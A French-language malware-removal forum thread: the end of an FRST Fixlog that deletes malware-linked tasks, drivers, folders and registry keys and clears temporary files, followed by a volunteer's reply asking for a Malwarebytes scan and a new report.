"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9D758682-9B58-4BCD-936C-F21B754D3F64}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G6" => supprimé(es) avec succès
C:\Users\bayen\Documents\TigerTrade => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\TigerTrade => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\prunld848 => déplacé(es) avec succès
C:\Program Files (x86)\WeekJbos => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\Graitec => déplacé(es) avec succès
C:\Windows\windefender.exe => déplacé(es) avec succès
C:\Windows\system32\Drivers\WinmonFS.sys => déplacé(es) avec succès
C:\Windows\system32\Drivers\Winmon.sys => déplacé(es) avec succès
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => non trouvé(e)

========= reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastDataX_is1" /f =========

Erreurÿ: Erreurÿ: le systŠme n'a pas trouv‚ la cl‚ ou la valeur de Registre sp‚cifi‚e.


========= Fin de Reg: =========


========= reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\foldershare" /f =========

Erreurÿ: Erreurÿ: le systŠme n'a pas trouv‚ la cl‚ ou la valeur de Registre sp‚cifi‚e.


========= Fin de Reg: =========


========= reg delete "HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" /f =========

Erreurÿ: Erreurÿ: le systŠme n'a pas trouv‚ la cl‚ ou la valeur de Registre sp‚cifi‚e.


========= Fin de Reg: =========


=========== EmptyTemp: ==========

BITS transfer queue => 9461760 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 43317946 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 548526 B
Edge => 204154367 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 21174 B
NetworkService => 0 B
bayen => 12742548 B

RecycleBin => 4586443312 B
EmptyTemp: => 4.5 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 13:11:07 ====


Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 29311
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: lenteur du pc, acceleration du ventilateur

Message par angelique » 16 juin 2019 16:37

Supprime C:\FRST

Fait un scan mbam ➯ https://www.malekal.com/tutoriel-malwar ... i-malware/

Poste le rapport et voit si c'est mieux
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite


Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »